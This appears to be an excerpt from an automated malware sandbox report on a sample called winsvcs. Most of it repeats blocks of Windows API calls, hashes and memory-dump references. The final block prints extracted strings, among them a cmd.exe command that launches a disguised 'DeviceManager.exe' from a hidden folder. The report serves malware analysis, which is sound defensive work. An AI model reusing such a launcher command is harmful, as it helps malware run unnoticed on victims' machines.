                                                                                                                                                                                                                          • Instruction ID: d34a4e6785fcd5d8804060be10e08f5a13504dab63f5c32d185528fae42e6cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E042B1689614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA4F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA5F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA67
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA73
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
                                                                                                                                                                                                                          • Instruction ID: b7b077b0efbaa99d57c9e01e78f00ef8fa4a74ec0cbc48e40112d5a6e4ee9a6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E04CB12883047AF65017B05C4EFB6352DA714B01F106820B792E91D1CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172), ref: 0040F288
                                                                                                                                                                                                                          • SendMessageA.USER32(C033FFFF,00000080,00000001,00000000), ref: 0040F298
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000172), ref: 0040F2A0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2AC
                                                                                                                                                                                                                          • SendMessageA.USER32(C033FFFF,00000080,00000000,00000000), ref: 0040F2BB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
                                                                                                                                                                                                                          • Instruction ID: d99028b12e30fd3fe39ac89642547f447b9f6d686350d1e6dd1f500a3f642d4a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E0ECB12887107BF65017A05C4EFEA352CAB14B01F105120F792AA1D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F2D0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F2E0
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F2E8
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2F4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F303
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
                                                                                                                                                                                                                          • Instruction ID: 6d76136d54f134a665c01184275cec0f141023eb7b6fb85ea418c97ed7197620
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE04CB12883047BF65017B05C4EFB6362DA714B01F106420B792E91D1CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FADF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAEF
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAF7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB03
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
                                                                                                                                                                                                                          • Instruction ID: b992e7cc074c589086062039aad7a199eea489cb61b4551384fa19084778ec30
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE04C712896147AF65117B05C4EFFA352DAB14B02F105520F796E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F6E3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6F3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6FB
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F707
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F716
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
                                                                                                                                                                                                                          • Instruction ID: 3e28eb3131572d2fac298909779aa96aa2a87ebeacc2675cd42585d1acf75fde
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE04C716896147AF65117B05C4EFFA352DAB14B01F109420F792E91D0DAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA97
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAA7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAAF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FABB
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FACA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
                                                                                                                                                                                                                          • Instruction ID: 1d36f7c1484a4d98f76bcf46e8ebade4d22d25235dcfb774b2c89be6bd50a90d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0EC712886007AF65017B05C0EFFA352CAB14B02F105420F792E90D0CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F69B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6AB
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6B3
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F6BF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F6CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
                                                                                                                                                                                                                          • Instruction ID: c4bcc1e1c1be38c76109329eba7caa4c6fa0630b5fa9804ec52db424150adb96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E042B1289614BAF65117B05C4EFFA362DAB14B02F10A420F792E91D0CAF86C468B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F360
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F370
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F378
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F384
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F393
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
                                                                                                                                                                                                                          • Instruction ID: f7383a7ab23df242e51286724413437d4e223c1a3943708dcd5a078a45c667a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E042B1288304BAF65117B06C4EFBA362DA714F02F106524F792E91D0CAF96C529B3E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB6F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB7F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB87
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB93
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
                                                                                                                                                                                                                          • Instruction ID: 4017f48e94712bf2f969ea7e51899ef551f7e2015cd638675003ecdf66d8c9fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F773
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F783
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F78B
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F797
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
                                                                                                                                                                                                                          • Instruction ID: 71a0b32a7878cc80f8160acc97d736f4d43d5bc296ae39aaeaecc328a0f48766
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51E04C716897147AF65117B05C4EFFA352DAB14B01F105520F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F318
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F328
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F330
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F33C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F34B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
                                                                                                                                                                                                                          • Instruction ID: 334fcfc35a5dd8afaa864d8e0f73d07486cccace6e0d136221b9713eec3d01bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE042B1289714BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB27
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB37
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB3F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB4B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
                                                                                                                                                                                                                          • Instruction ID: 0b98619118816d2a2a2b8005e09654c782942d7a3eccd87f9c26c283519b54bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DE04C712896147AF65117B05C4EFFA352DAB14B02F105420F792E91D0CAF95D424B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F72B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F73B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F743
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F74F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F75E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
                                                                                                                                                                                                                          • Instruction ID: b83773e1df3edd97bc25a0b786c3283d31d19127a53598c0ef36f1eb61ead98d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E04C716896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3F0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F400
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F408
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F414
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F423
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
                                                                                                                                                                                                                          • Instruction ID: 2b10cc25e026ddcf9697d52d97dd030663e87e79539ddb17dd0f1381a82fdc3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3E04CB1288304BAF65017B05C4EFB6352DA714B01F106520B792E91D1CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F803
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F813
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F81B
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F827
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F836
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
                                                                                                                                                                                                                          • Instruction ID: 262968f47342c6bcf14978d3074c3fef03dfaca683abf3537834e770978e0ce4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E042B1299614BAF65117B09C4EFFA362DEB14B02F106420F792E91D0CAF86D428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3A8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F3B8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F3C0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F3CC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F3DB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
                                                                                                                                                                                                                          • Instruction ID: 510ba6cb99a25d9121a1dffcbb3beb8f5a9f0f327987106bb48a6d04e3a7d157
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E04C712897147EF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F7BB
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F7CB
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F7D3
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F7DF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7EE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
                                                                                                                                                                                                                          • Instruction ID: fc2c61729b590515bdfd3972ace7de4b77c4262dfd1b686aa39bd5981164a283
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00402100
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004051CC,00000000,00000001,004051BC,?), ref: 0040212F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • %windir%\system32\cmd.exe, xrefs: 00402142
                                                                                                                                                                                                                          • /c start _ & _\DeviceManager.exe & exit, xrefs: 004021AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
